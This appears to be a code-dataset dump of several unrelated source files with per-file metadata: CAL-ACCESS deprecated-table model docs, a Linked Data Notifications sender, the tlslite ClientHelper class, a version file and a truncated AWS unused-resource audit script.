This table is 95 percent identical to LOBBYIST_CONTRIBUTIONS2_CD and LOBBYIST_CONTRIBUTIONS3_CD.
According to "Cal-Access Tables, Columns, Indexes", this is a temporary
table used to generate the actual Lobbyist contribution disclosure table,
which is LOBBYIST_CONTRIBUTIONS3_CD.
Also, the most recent values observed in FILING_PERIOD_START_DT are for the
April 2001, so probably this table is no longer in use.
Deprecated table for the disclosure of campaign contributions made by lobbyists.
This table is 95 percent identical to LOBBYIST_CONTRIBUTIONS1_CD and LOBBYIST_CONTRIBUTIONS3_CD.
According to "Cal-Access Tables, Columns, Indexes", this is a temporary
table used to generate the actual Lobbyist contribution disclosure table,
which is LOBBYIST_CONTRIBUTIONS3_CD.
Also, the most recent values observed in FILING_PERIOD_START_DT are for the
April 2001, so probably this table is no longer in use.
Deprecated table for the disclosure of campaign contributions made by lobbyists.
This table is 95 percent identical to LOBBYIST_CONTRIBUTIONS1_CD and LOBBYIST_CONTRIBUTIONS2_CD.
According to "Cal-Access Tables, Columns, Indexes", this is the actual
Lobbyist contribution disclosure table generated from the other two
temporary tables: LOBBYIST_CONTRIBUTIONS1_CD and LOBBYIST_CONTRIBUTIONS2_CD.
Also, the most recent values observed in FILING_PERIOD_START_DT are for the
April 2001, so probably this table is no longer in use.
Deprecated table for the disclosure of lobbyist relationships.
This table is identical to LOBBYIST_EMP_LOBBYIST2_CD.
Both tables are documented in "Cal-Access Tables, Columns, Indexes", but with
this cryptic note: "Matt needs to describe the relationship between the
multiple tables. Documentation should be cloned from D H's documentation on
these tables. Cox 5/11/2000".
Also, the distinct SESSION_ID values span from 1995 to 2001, so probably this
table is no longer in use.
Deprecated table for the disclosure of lobbyist relationships.
This table is identical to LOBBYIST_EMP_LOBBYIST1_CD.
Both tables are documented in "Cal-Access Tables, Columns, Indexes", but with
this cryptic note: "Matt needs to describe the relationship between the
multiple tables. Documentation should be cloned from D H's documentation on
these tables. Cox 5/11/2000".
Also, the distinct SESSION_ID values span from 1995 to 2001, so probably this
table is no longer in use.
Deprecated table for the disclosure of lobbyist relationships.
This table is 99 percent identical to LOBBYIST_EMPLOYER2_CD and LOBBYIST_EMPLOYER3_CD.
All three tables are documented in "Cal-Access Tables, Columns, Indexes", but
with this cryptic note: "Matt needs to describe the relationship between the
multiple tables. Documentation should be cloned from D H's documentation on
these tables. Cox 5/11/2000".
Also, the only value in observed in SESSION_YR_1 is 1999 and the only value
observed in SESSION_YR_2 is 2000.
Deprecated table for the disclosure of lobbyist relationships.
This table is 99 percent identical to LOBBYIST_EMPLOYER1_CD and LOBBYIST_EMPLOYER3_CD.
All three tables are documented in "Cal-Access Tables, Columns, Indexes", but
with this cryptic note: "Matt needs to describe the relationship between the
multiple tables. Documentation should be cloned from D H's documentation on
these tables. Cox 5/11/2000".
Also, the only value in observed in SESSION_YR_1 is 1999 and the only value
observed in SESSION_YR_2 is 2000.
Deprecated table for the disclosure of lobbyist relationships.
This table is 99 percent identical to LOBBYIST_EMPLOYER1_CD and LOBBYIST_EMPLOYER2_CD.
All three tables are documented in "Cal-Access Tables, Columns, Indexes", but
with this cryptic note: "Matt needs to describe the relationship between the
multiple tables. Documentation should be cloned from D H's documentation on
these tables. Cox 5/11/2000".
Also, the only value in observed in SESSION_YR_1 is 1999 and the only value
observed in SESSION_YR_2 is 2000.
Deprecated table for the disclosure of lobbyist relationships.
This table is identical to LOBBYIST_EMPLOYER_FIRMS2_CD.
Both tables are documented in "Cal-Access Tables, Columns, Indexes", but with
this cryptic note: "Matt needs to describe the relationship between the
multiple tables. Documentation should be cloned from D H's documentation on
these tables. Cox 5/11/2000".
Also the distinct SESSION_ID values span from 1995 to 2001, so probably this
table is no longer in use.
Deprecated table for the disclosure of lobbyist relationships.
This table is identical to LOBBYIST_EMPLOYER_FIRMS1_CD.
Both tables are documented in "Cal-Access Tables, Columns, Indexes", but with
this cryptic note: "Matt needs to describe the relationship between the
multiple tables. Documentation should be cloned from D H's documentation on
these tables. Cox 5/11/2000".
Also the distinct SESSION_ID values span from 1995 to 2001, so probably this
table is no longer in use.
Undocumented.
An empty file of the same name is included in the Secretary of State's daily CAL-ACCESS database exports.
This table is documented in "Cal-Access Tables, Columns, Indexes", but with
this cryptic note: "Matt needs to describe the relationship between the
multiple tables. Documentation should be cloned from D H's documentation
on these tables. Cox 5/11/2000".
Also, the columns on this table are identical to the columns on the
LOBBYIST_EMPLOYER1_CD, LOBBYIST_EMPLOYER2_CD and LOBBYIST_EMPLOYER3_CD
tables.
Deprecated table for the disclosure of lobbyist relationships.
This table is identical to LOBBYIST_FIRM2_CD and LOBBYIST_FIRM3_CD.
All three tables are documented in "Cal-Access Tables, Columns, Indexes", but
with this cryptic note: "Matt needs to describe the relationship between the
multiple tables. Documentation should be cloned from D H's documentation on
these tables. Cox 5/11/2000".
Also, the distinct SESSION_YR_1 values are 2001, and the distinct SESSION_YR_2
are 2002.
Deprecated table for the disclosure of lobbyist relationships.
This table is identical to LOBBYIST_FIRM1_CD and LOBBYIST_FIRM3_CD.
All three tables are documented in "Cal-Access Tables, Columns, Indexes", but
with this cryptic note: "Matt needs to describe the relationship between the
multiple tables. Documentation should be cloned from D H's documentation on
these tables. Cox 5/11/2000".
Also, the distinct SESSION_YR_1 values are 2001, and the distinct SESSION_YR_2
are 2002.
Deprecated table for the disclosure of lobbyist relationships.
This table is identical to LOBBYIST_FIRM1_CD and LOBBYIST_FIRM2_CD.
All three tables are documented in "Cal-Access Tables, Columns, Indexes", but
with this cryptic note: "Matt needs to describe the relationship between the
multiple tables. Documentation should be cloned from D H's documentation on
these tables. Cox 5/11/2000".
Also, the distinct SESSION_YR_1 values are 2001, and the distinct SESSION_YR_2
are 2002.
Deprecated table for the disclosure of lobbyist relationships.
This table is identical to LOBBYIST_FIRM_EMPLOYER2_CD.
Both tables are documented in "Cal-Access Tables, Columns, Indexes", but with
this cryptic note: "Matt needs to describe the relationship between the
multiple tables. Documentation should be cloned from D H's documentation on
these tables. Cox 5/11/2000".
Also RPT_START and RPT_END each contain only one distinct value, "2001-04-01"
and "2001-06-30", respectively.
Deprecated table for the disclosure of lobbyist relationships.
This table is identical to LOBBYIST_FIRM_EMPLOYER1_CD.
Both tables are documented in "Cal-Access Tables, Columns, Indexes", but with
this cryptic note: "Matt needs to describe the relationship between the
multiple tables. Documentation should be cloned from D H's documentation on
these tables. Cox 5/11/2000".
Also RPT_START and RPT_END each contain only one distinct value, "2001-04-01"
and "2001-06-30", respectively.
Undocumented.
An empty file of the same name is included in the Secretary of State's daily CAL-ACCESS database exports.
This table is documented in "Cal-Access Tables, Columns, Indexes", but with
this cryptic note: "Matt needs to describe the relationship between the
multiple tables. Documentation should be cloned from D H's documentation
on these tables. Cox 5/11/2000".
Also, the columns on this table are identical to the columns on the
LOBBYIST_FIRM1_CD, LOBBYIST_FIRM2_CD and LOBBYIST_FIRM3_CD tables.
Deprecated table for the disclosure of lobbyist relationships.
This table is identical to LOBBYIST_FIRM_LOBBYIST2_CD.
Both tables are documented in "Cal-Access Tables, Columns, Indexes", but with
this cryptic note: "Matt needs to describe the relationship between the
multiple tables. Documentation should be cloned from D H's documentation on
these tables. Cox 5/11/2000".
Also, all rows have the same SESSION_ID value: 2001.
Deprecated table for the disclosure of lobbyist relationships.
This table is identical to LOBBYIST_FIRM_LOBBYIST1_CD.
Both tables are documented in "Cal-Access Tables, Columns, Indexes", but with
this cryptic note: "Matt needs to describe the relationship between the
multiple tables. Documentation should be cloned from D H's documentation on
these tables. Cox 5/11/2000".
Also, all rows have the same SESSION_ID value: 2001.
Meta model options.
Meta model options.
Meta model options.
Meta model options.
Meta model options.
Meta model options.
Meta model options.
Meta model options.
Meta model options.
Meta model options.
Meta model options.
Meta model options.
Meta model options.
Meta model options.
Meta model options.
Meta model options.
Meta model options.
Meta model options.
Meta model options.
Meta model options.
Meta model options.
Meta model options.
Meta model options.
Models for storing inactive and deprecated tables from the CAL-ACCESS database.
!/usr/bin/env python -*- coding: utf-8 -*- Models Annotations | 10,299 | en | 0.822327 |
from rdflib import Graph
import requests
import ipaddress
import json
import socket
from urllib.parse import urlparse
from .base import BaseLDN
class Sender(BaseLDN):
def __init__(self, **kwargs):
super(self.__class__, self).__init__(**kwargs)
self.allow_localhost = kwargs.get('allow_localhost', False)
def __accept_post_options(self, inbox, **kwargs):
r = requests.options(inbox, **kwargs)
if r.status_code == requests.codes.ok and 'accept-post' in r.headers:
if self.JSON_LD in r.headers['accept-post']:
return self.JSON_LD
for content_type in r.headers['accept-post'].split(','):
return self.content_type_to_mime_type(content_type)
def __is_localhost(self, inbox):
return ipaddress.ip_address(socket.gethostbyname(
urlparse(inbox).hostname)).is_loopback
def __post_message(self, inbox, data, content_type, **kwargs):
if self.allow_localhost or not self.__is_localhost(inbox):
headers = kwargs.pop("headers", dict())
headers['content-type'] = content_type
r = requests.post(inbox, data=data, headers=headers, **kwargs)
r.raise_for_status()
else:
raise ValueError("Invalid local inbox.")
def send(self, inbox, data, **kwargs):
"""Send the provided data to an inbox."""
if isinstance(data, dict) or isinstance(data, list):
self.__post_message(inbox, json.dumps(data), self.JSON_LD,
**kwargs)
elif isinstance(data, str):
self.__post_message(inbox, data, self.JSON_LD, **kwargs)
elif isinstance(data, Graph):
ct = self.__accept_post_options(inbox, **kwargs) or self.JSON_LD
self.__post_message(inbox, data.serialize(format=ct), ct,
**kwargs)
else:
raise TypeError(
"You cannot send data of type {}.".format(type(data)))
| ldnlib/sender.py | 2,017 | Send the provided data to an inbox. | 35 | en | 0.68172 |
"""
A helper class for using TLS Lite with stdlib clients
(httplib, xmlrpclib, imaplib, poplib).
"""
from tlslite.Checker import Checker
class ClientHelper:
"""This is a helper class used to integrate TLS Lite with various
TLS clients (e.g. poplib, smtplib, httplib, etc.)"""
def __init__(self,
username=None, password=None, sharedKey=None,
certChain=None, privateKey=None,
cryptoID=None, protocol=None,
x509Fingerprint=None,
x509TrustList=None, x509CommonName=None,
settings = None):
"""
For client authentication, use one of these argument
combinations:
- username, password (SRP)
- username, sharedKey (shared-key)
- certChain, privateKey (certificate)
For server authentication, you can either rely on the
implicit mutual authentication performed by SRP or
shared-keys, or you can do certificate-based server
authentication with one of these argument combinations:
- cryptoID[, protocol] (requires cryptoIDlib)
- x509Fingerprint
- x509TrustList[, x509CommonName] (requires cryptlib_py)
Certificate-based server authentication is compatible with
SRP or certificate-based client authentication. It is
not compatible with shared-keys.
The constructor does not perform the TLS handshake itself, but
simply stores these arguments for later. The handshake is
performed only when this class needs to connect with the
server. Then you should be prepared to handle TLS-specific
exceptions. See the client handshake functions in
L{tlslite.TLSConnection.TLSConnection} for details on which
exceptions might be raised.
@type username: str
@param username: SRP or shared-key username. Requires the
'password' or 'sharedKey' argument.
@type password: str
@param password: SRP password for mutual authentication.
Requires the 'username' argument.
@type sharedKey: str
@param sharedKey: Shared key for mutual authentication.
Requires the 'username' argument.
@type certChain: L{tlslite.X509CertChain.X509CertChain} or
L{cryptoIDlib.CertChain.CertChain}
@param certChain: Certificate chain for client authentication.
Requires the 'privateKey' argument. Excludes the SRP or
shared-key related arguments.
@type privateKey: L{tlslite.utils.RSAKey.RSAKey}
@param privateKey: Private key for client authentication.
Requires the 'certChain' argument. Excludes the SRP or
shared-key related arguments.
@type cryptoID: str
@param cryptoID: cryptoID for server authentication. Mutually
exclusive with the 'x509...' arguments.
@type protocol: str
@param protocol: cryptoID protocol URI for server
authentication. Requires the 'cryptoID' argument.
@type x509Fingerprint: str
@param x509Fingerprint: Hex-encoded X.509 fingerprint for
server authentication. Mutually exclusive with the 'cryptoID'
and 'x509TrustList' arguments.
@type x509TrustList: list of L{tlslite.X509.X509}
@param x509TrustList: A list of trusted root certificates. The
other party must present a certificate chain which extends to
one of these root certificates. The cryptlib_py module must be
installed to use this parameter. Mutually exclusive with the
'cryptoID' and 'x509Fingerprint' arguments.
@type x509CommonName: str
@param x509CommonName: The end-entity certificate's 'CN' field
must match this value. For a web server, this is typically a
server name such as 'www.amazon.com'. Mutually exclusive with
the 'cryptoID' and 'x509Fingerprint' arguments. Requires the
'x509TrustList' argument.
@type settings: L{tlslite.HandshakeSettings.HandshakeSettings}
@param settings: Various settings which can be used to control
the ciphersuites, certificate types, and SSL/TLS versions
offered by the client.
"""
self.username = None
self.password = None
self.sharedKey = None
self.certChain = None
self.privateKey = None
self.checker = None
#SRP Authentication
if username and password and not \
(sharedKey or certChain or privateKey):
self.username = username
self.password = password
#Shared Key Authentication
elif username and sharedKey and not \
(password or certChain or privateKey):
self.username = username
self.sharedKey = sharedKey
#Certificate Chain Authentication
elif certChain and privateKey and not \
(username or password or sharedKey):
self.certChain = certChain
self.privateKey = privateKey
#No Authentication
elif not password and not username and not \
sharedKey and not certChain and not privateKey:
pass
else:
raise ValueError("Bad parameters")
#Authenticate the server based on its cryptoID or fingerprint
if sharedKey and (cryptoID or protocol or x509Fingerprint):
raise ValueError("Can't use shared keys with other forms of"\
"authentication")
self.checker = Checker(cryptoID, protocol, x509Fingerprint,
x509TrustList, x509CommonName)
self.settings = settings
self.tlsSession = None
def _handshake(self, tlsConnection):
if self.username and self.password:
tlsConnection.handshakeClientSRP(username=self.username,
password=self.password,
checker=self.checker,
settings=self.settings,
session=self.tlsSession)
elif self.username and self.sharedKey:
tlsConnection.handshakeClientSharedKey(username=self.username,
sharedKey=self.sharedKey,
settings=self.settings)
else:
tlsConnection.handshakeClientCert(certChain=self.certChain,
privateKey=self.privateKey,
checker=self.checker,
settings=self.settings,
session=self.tlsSession)
self.tlsSession = tlsConnection.session | third_party/tlslite/tlslite/integration/ClientHelper.py | 6,851 | This is a helper class used to integrate TLS Lite with various
TLS clients (e.g. poplib, smtplib, httplib, etc.)
For client authentication, use one of these argument
combinations:
- username, password (SRP)
- username, sharedKey (shared-key)
- certChain, privateKey (certificate)
For server authentication, you can either rely on the
implicit mutual authentication performed by SRP or
shared-keys, or you can do certificate-based server
authentication with one of these argument combinations:
- cryptoID[, protocol] (requires cryptoIDlib)
- x509Fingerprint
- x509TrustList[, x509CommonName] (requires cryptlib_py)
Certificate-based server authentication is compatible with
SRP or certificate-based client authentication. It is
not compatible with shared-keys.
The constructor does not perform the TLS handshake itself, but
simply stores these arguments for later. The handshake is
performed only when this class needs to connect with the
server. Then you should be prepared to handle TLS-specific
exceptions. See the client handshake functions in
L{tlslite.TLSConnection.TLSConnection} for details on which
exceptions might be raised.
@type username: str
@param username: SRP or shared-key username. Requires the
'password' or 'sharedKey' argument.
@type password: str
@param password: SRP password for mutual authentication.
Requires the 'username' argument.
@type sharedKey: str
@param sharedKey: Shared key for mutual authentication.
Requires the 'username' argument.
@type certChain: L{tlslite.X509CertChain.X509CertChain} or
L{cryptoIDlib.CertChain.CertChain}
@param certChain: Certificate chain for client authentication.
Requires the 'privateKey' argument. Excludes the SRP or
shared-key related arguments.
@type privateKey: L{tlslite.utils.RSAKey.RSAKey}
@param privateKey: Private key for client authentication.
Requires the 'certChain' argument. Excludes the SRP or
shared-key related arguments.
@type cryptoID: str
@param cryptoID: cryptoID for server authentication. Mutually
exclusive with the 'x509...' arguments.
@type protocol: str
@param protocol: cryptoID protocol URI for server
authentication. Requires the 'cryptoID' argument.
@type x509Fingerprint: str
@param x509Fingerprint: Hex-encoded X.509 fingerprint for
server authentication. Mutually exclusive with the 'cryptoID'
and 'x509TrustList' arguments.
@type x509TrustList: list of L{tlslite.X509.X509}
@param x509TrustList: A list of trusted root certificates. The
other party must present a certificate chain which extends to
one of these root certificates. The cryptlib_py module must be
installed to use this parameter. Mutually exclusive with the
'cryptoID' and 'x509Fingerprint' arguments.
@type x509CommonName: str
@param x509CommonName: The end-entity certificate's 'CN' field
must match this value. For a web server, this is typically a
server name such as 'www.amazon.com'. Mutually exclusive with
the 'cryptoID' and 'x509Fingerprint' arguments. Requires the
'x509TrustList' argument.
@type settings: L{tlslite.HandshakeSettings.HandshakeSettings}
@param settings: Various settings which can be used to control
the ciphersuites, certificate types, and SSL/TLS versions
offered by the client.
A helper class for using TLS Lite with stdlib clients
(httplib, xmlrpclib, imaplib, poplib).
SRP AuthenticationShared Key AuthenticationCertificate Chain AuthenticationNo AuthenticationAuthenticate the server based on its cryptoID or fingerprint | 3,457 | en | 0.719124 |
""":mod:`kinsumer.version` --- Version information
~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~
"""
VERSION_INFO = (0, 5, 3)
VERSION = '{}.{}.{}'.format(*VERSION_INFO)
if __name__ == '__main__':
print(VERSION)
| kinsumer/version.py | 222 | :mod:`kinsumer.version` --- Version information
~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~ | 98 | pl | 0.228766 |
"""
SYNOPSIS
--------
Get the details of unused resources present across regions in the AWS account
DESCRIPTION
-----------
This script provides a detailed overview of the number of unused resources present in the AWS account.
It provides service-wise details of unused resources lying around in all the regions of the AWS account.
PREREQUISITES
-------------
- Workstation with Python version 3 and above
- AWS python-based SDK: boto3
Installation command: pip3 install boto3
- pandas framework and openpyxl for reporting operations (xlsx file).
Installation command(s):
- pip3 install pandas
- pip3 install openpyxl
- User credentials (Access Key Id and Secret Accces Key) of a user having atleast the Security Audit permission and above on the AWS account
EXAMPLE
-------
This script can be executed on a python compiler (AWS Cloudshell, Powershell, bash, any command line tool with python installed)
Command: python ./unused_aws_resources.py --accessKey <AWS Access Key Id> --secretKey <AWS Secret Access Key>
OUTPUT
------
- The script will provide a summarized count of all unused resources in the account.
- For a detailed view, the user can refer to the .xlsx file that will be generated by the script.
"""
import json
import boto3
import argparse
import multiprocessing
import csv
import os
import pandas as pd
import sys
import glob
from urllib.request import urlopen
def ebs_volume(function, credentials, unused_resource_count, region_list):
print('Scanning EBS Volumes')
volume_count = 0
unused_volume_detail = []
for region in region_list:
try:
ec2 = boto3.resource('ec2', aws_access_key_id=credentials['access_key'], aws_secret_access_key=credentials['secret_key'], region_name=region)
volumes = list(ec2.volumes.all())
unused_volumes = set([volume.volume_id for volume in volumes if volume.state == 'available'])
for volume_id in unused_volumes:
unused_volume_detail.append({'ResourceType':'AWS::EC2::Volume','ResourceId':volume_id,'Region':region})
volume_count+=len(unused_volumes)
except:
pass
if volume_count:
unused_volume_detail = json.loads(json.dumps(unused_volume_detail))
f = csv.writer(open("./aws_logs/ebs_volume.csv", "w", newline=''))
f.writerow(["ResourceType", "ResourceId", "Region"])
for unused_volume_detail in unused_volume_detail:
f.writerow([unused_volume_detail["ResourceType"],
unused_volume_detail["ResourceId"],
unused_volume_detail["Region"]])
unused_resource_count[function] = volume_count
def elastic_ip(function, credentials, unused_resource_count, region_list):
print('Scanning Elastic IPs')
eip_count = 0
unused_eip_detail = []
for region in region_list:
try:
ec2_client = boto3.client('ec2', aws_access_key_id=credentials['access_key'], aws_secret_access_key=credentials['secret_key'], region_name=region)
eip_data = ec2_client.describe_addresses()['Addresses']
for eip in eip_data:
try:
AssociationId = eip['AssociationId']
except:
AssociationId = ''
if not AssociationId:
unused_eip_detail.append({'ResourceType':'AWS::EC2::EIP','ResourceId':eip['AllocationId'],'Region':region})
eip_count += 1
except:
pass
if eip_count:
unused_eip_detail = json.loads(json.dumps(unused_eip_detail))
f = csv.writer(open("./aws_logs/elastic_ip.csv", "w", newline=''))
f.writerow(["ResourceType", "ResourceId", "Region"])
for unused_eip_detail in unused_eip_detail:
f.writerow([unused_eip_detail["ResourceType"],
unused_eip_detail["ResourceId"],
unused_eip_detail["Region"]])
unused_resource_count[function] = eip_count
def network_interface(function, credentials, unused_resource_count, region_list):
print('Scanning Network Interfaces')
ni_count = 0
unused_ni_detail = []
for region in region_list:
try:
ec2 = boto3.resource('ec2', aws_access_key_id=credentials['access_key'], aws_secret_access_key=credentials['secret_key'], region_name=region)
network_interfaces = list(ec2.network_interfaces.all())
unused_nis = set([ni.network_interface_id for ni in network_interfaces if ni.status == 'available'])
for network_interface_id in unused_nis:
unused_ni_detail.append({'ResourceType':'AWS::EC2::NetworkInterface','ResourceId':network_interface_id,'Region':region})
ni_count+=len(unused_nis)
except:
pass
if ni_count:
unused_ni_detail = json.loads(json.dumps(unused_ni_detail))
f = csv.writer(open("./aws_logs/network_interface.csv", "w", newline=''))
f.writerow(["ResourceType", "ResourceId", "Region"])
for unused_ni_detail in unused_ni_detail:
f.writerow([unused_ni_detail["ResourceType"],
unused_ni_detail["ResourceId"],
unused_ni_detail["Region"]])
unused_resource_count[function] = ni_count
def vpc(function, credentials, unused_resource_count, region_list):
print('Scanning VPCs')
vpc_count = 0
unused_vpc_detail = []
for region in region_list:
try:
ec2 = boto3.resource('ec2', aws_access_key_id=credentials['access_key'], aws_secret_access_key=credentials['secret_key'], region_name=region)
vpcs = list(ec2.vpcs.all())
network_interfaces = list(ec2.network_interfaces.all())
all_vpcs = set([vpc.vpc_id for vpc in vpcs])
all_active_vpcs = set([vpc['VpcId'] for ni in network_interfaces for vpc in ni.vpc])
unused_vpcs = all_vpcs - all_active_vpcs
for vpcid in unused_vpcs:
unused_vpc_detail.append({'ResourceType':'AWS::EC2::VPC','ResourceId':vpcid,'Region':region})
vpc_count+=len(unused_vpcs)
except:
pass
if vpc_count:
unused_vpc_detail = json.loads(json.dumps(unused_vpc_detail))
f = csv.writer(open("./aws_logs/vpc.csv", "w", newline=''))
f.writerow(["ResourceType", "ResourceId", "Region"])
for unused_vpc_detail in unused_vpc_detail:
f.writerow([unused_vpc_detail["ResourceType"],
unused_vpc_detail["ResourceId"],
unused_vpc_detail["Region"]])
unused_resource_count[function] = vpc_count
def subnet(function, credentials, unused_resource_count, region_list):
print('Scanning Subnets')
subnet_count = 0
unused_subnet_detail = []
for region in region_list:
try:
ec2 = boto3.resource('ec2', aws_access_key_id=credentials['access_key'], aws_secret_access_key=credentials['secret_key'], region_name=region)
subnets = list(ec2.subnets.all())
network_interfaces = list(ec2.network_interfaces.all())
all_subnets = set([subnet.subnet_id for subnet in subnets])
all_active_subnets = set([subnet['SubnetId'] for ni in network_interfaces for subnet in ni.subnet])
unused_subnets = all_subnets - all_active_subnets
for subnetid in unused_subnets:
unused_subnet_detail.append({'ResourceType':'AWS::EC2::Subnet','ResourceId':subnetid,'Region':region})
subnet_count+=len(unused_subnets)
except:
pass
if subnet_count:
unused_subnet_detail = json.loads(json.dumps(unused_subnet_detail))
f = csv.writer(open("./aws_logs/subnet.csv", "w", newline=''))
f.writerow(["ResourceType", "ResourceId", "Region"])
for unused_subnet_detail in unused_subnet_detail:
f.writerow([unused_subnet_detail["ResourceType"],
unused_subnet_detail["ResourceId"],
unused_subnet_detail["Region"]])
unused_resource_count[function] = subnet_count
def security_group(function, credentials, unused_resource_count, region_list):
print('Scanning Security Groups')
sg_count = 0
unused_sg_detail = []
for region in region_list:
try:
ec2 = boto3.resource('ec2', aws_access_key_id=credentials['access_key'], aws_secret_access_key=credentials['secret_key'], region_name=region)
sgs = list(ec2.security_groups.all())
network_interfaces = list(ec2.network_interfaces.all())
all_sgs = set([sg.group_id for sg in sgs])
all_inst_sgs = set([sg['GroupId'] for ni in network_interfaces for sg in ni.groups])
unused_sgs = all_sgs - all_inst_sgs
for sgid in unused_sgs:
unused_sg_detail.append({'ResourceType':'AWS::EC2::SecurityGroup','ResourceId':sgid,'Region':region})
sg_count+=len(unused_sgs)
except:
pass
if sg_count:
unused_sg_detail = json.loads(json.dumps(unused_sg_detail))
f = csv.writer(open("./aws_logs/security_group.csv", "w", newline=''))
f.writerow(["ResourceType", "ResourceId", "Region"])
for unused_sg_detail in unused_sg_detail:
f.writerow([unused_sg_detail["ResourceType"],
unused_sg_detail["ResourceId"],
unused_sg_detail["Region"]])
unused_resource_count[function] = sg_count
def classic_loadbalancer(function, credentials, unused_resource_count, region_list):
print('Scanning Classic Load balancers')
elb_count = 0
unused_elb_detail = []
for region in region_list:
try:
classic_lb = boto3.client('elb', aws_access_key_id=credentials['access_key'], aws_secret_access_key=credentials['secret_key'], region_name=region)
paginated_data=[]
elb_paginator = classic_lb.get_paginator('describe_load_balancers')
for load_balancers in elb_paginator.paginate():
paginated_data.extend(load_balancers['LoadBalancerDescriptions'])
for elb_detail in paginated_data:
instance_health_status = []
instance_data = classic_lb.describe_instance_health(LoadBalancerName=elb_detail['LoadBalancerName'])['InstanceStates']
for instance in instance_data:
instance_health_status.append(instance['State'])
if 'InService' not in instance_health_status:
unused_elb_detail.append({'ResourceType':'AWS::ElasticLoadBalancing::LoadBalancer','ResourceId':elb_detail['LoadBalancerName'],'Region':region})
elb_count+=1
except:
pass
if elb_count:
unused_elb_detail = json.loads(json.dumps(unused_elb_detail))
f = csv.writer(open("./aws_logs/classic_loadbalancer.csv", "w", newline=''))
f.writerow(["ResourceType", "ResourceId", "Region"])
for unused_elb_detail in unused_elb_detail:
f.writerow([unused_elb_detail["ResourceType"],
unused_elb_detail["ResourceId"],
unused_elb_detail["Region"]])
unused_resource_count[function] = elb_count
def app_nw_gateway_loadbalancer(function, credentials, unused_resource_count, region_list):
print('Scanning Application/Network/Gateway Load balancers')
elbv2_count = 0
unused_elbv2_detail = []
for region in region_list:
try:
elbv2 = boto3.client('elbv2', aws_access_key_id=credentials['access_key'], aws_secret_access_key=credentials['secret_key'], region_name=region)
paginated_data=[]
elbv2_paginator = elbv2.get_paginator('describe_load_balancers')
for load_balancers in elbv2_paginator.paginate():
paginated_data.extend(load_balancers['LoadBalancers'])
for elbv2_detail in paginated_data:
target_health_status = []
try:
target_group_detail = elbv2.describe_target_groups(LoadBalancerArn=elbv2_detail['LoadBalancerArn'])['TargetGroups']
for target_group in target_group_detail:
target_group_health = elbv2.describe_target_health(TargetGroupArn=target_group['TargetGroupArn'])['TargetHealthDescriptions']
for target in target_group_health:
target_health_status.append(target['TargetHealth']['State'])
except:
pass
if 'healthy' not in target_health_status:
unused_elbv2_detail.append({'ResourceType':'AWS::ElasticLoadBalancingV2::LoadBalancer', 'LoadBalancer_Type':elbv2_detail['Type'], 'ResourceId':elbv2_detail['LoadBalancerName'],'Region':region})
elbv2_count+=1
except:
pass
if elbv2_count:
unused_elbv2_detail = json.loads(json.dumps(unused_elbv2_detail))
f = csv.writer(open("./aws_logs/app_nw_gateway_loadbalancer.csv", "w", newline=''))
f.writerow(["ResourceType", "LoadBalancer_Type", "ResourceId", "Region"])
for unused_elbv2_detail in unused_elbv2_detail:
f.writerow([unused_elbv2_detail["ResourceType"],
unused_elbv2_detail["LoadBalancer_Type"],
unused_elbv2_detail["ResourceId"],
unused_elbv2_detail["Region"]])
unused_resource_count[function] = elbv2_count
def iam_user(function, credentials, unused_resource_count, region_list):
print('Scanning IAM Users')
iamuser_count = 0
unused_iamuser_detail = []
try:
iam = boto3.resource('iam', aws_access_key_id=credentials['access_key'], aws_secret_access_key=credentials['secret_key'])
iam_client = boto3.client('iam', aws_access_key_id=credentials['access_key'], aws_secret_access_key=credentials['secret_key'])
iamuser_data = list(iam.users.all())
for user in iamuser_data:
if not user.password_last_used and not iam_client.list_access_keys(UserName=user.name)['AccessKeyMetadata']:
unused_iamuser_detail.append({'ResourceType':'AWS::IAM::User', 'ResourceId': user.name, 'Region':'Global'})
iamuser_count += 1
except:
pass
if iamuser_count:
unused_iamuser_detail = json.loads(json.dumps(unused_iamuser_detail))
f = csv.writer(open("./aws_logs/iam_user.csv", "w", newline=''))
f.writerow(["ResourceType", "ResourceId", "Region"])
for unused_iamuser_detail in unused_iamuser_detail:
f.writerow([unused_iamuser_detail["ResourceType"],
unused_iamuser_detail["ResourceId"],
unused_iamuser_detail["Region"]])
unused_resource_count[function] = iamuser_count
def iam_group(function, credentials, unused_resource_count, region_list):
print('Scanning IAM Groups')
iamgroup_count = 0
unused_iamgroup_detail = []
try:
iam = boto3.resource('iam', aws_access_key_id=credentials['access_key'], aws_secret_access_key=credentials['secret_key'])
iam_client = boto3.client('iam', aws_access_key_id=credentials['access_key'], aws_secret_access_key=credentials['secret_key'])
iamgroup_data = list(iam.groups.all())
for group in iamgroup_data:
if not iam_client.get_group(GroupName=group.name)['Users']:
unused_iamgroup_detail.append({'ResourceType':'AWS::IAM::Group', 'ResourceId': group.name, 'Region':'Global'})
iamgroup_count += 1
except:
pass
if iamgroup_count:
unused_iamgroup_detail = json.loads(json.dumps(unused_iamgroup_detail))
f = csv.writer(open("./aws_logs/iam_group.csv", "w", newline=''))
f.writerow(["ResourceType", "ResourceId", "Region"])
for unused_iamgroup_detail in unused_iamgroup_detail:
f.writerow([unused_iamgroup_detail["ResourceType"],
unused_iamgroup_detail["ResourceId"],
unused_iamgroup_detail["Region"]])
unused_resource_count[function] = iamgroup_count
def main(arg):
access_key = arg.accessKey
secret_key = arg.secretKey
region_list = []
unused_resource_details = {}
try:
print("Connecting to AWS account ")
session = boto3.session.Session(aws_access_key_id=access_key, aws_secret_access_key=secret_key)
except:
print("\033[1;31;40m ""Please do Check for Credentials provided or Internet Connection and Try Again\n")
quit()
iam = session.client('sts')
account_id = iam.get_caller_identity()["Account"]
print("Successfully connected to AWS account", account_id)
print("Scanning for unused resources across all available regions.")
print("Wait for few minutes...\n")
function_list= [ ebs_volume, elastic_ip, network_interface, vpc, subnet, security_group, classic_loadbalancer, app_nw_gateway_loadbalancer,
iam_user, iam_group ]
print("Collecting list of enabled region")
available_regions = session.client('ec2',region_name="us-east-1")
enabled_regions = available_regions.describe_regions()['Regions']
for region in enabled_regions:
region_list.append(region['RegionName'])
manager = multiprocessing.Manager()
unused_resource_count = manager.dict()
credentials = manager.dict()
credentials['access_key'] = access_key
credentials['secret_key'] = secret_key
credentials['account_id'] = account_id
jobs = []
try:
os.mkdir("./aws_logs")
except:
pass
for function in function_list:
try:
p = multiprocessing.Process(target=function, args=(function, credentials, unused_resource_count, region_list))
jobs.append(p)
p.start()
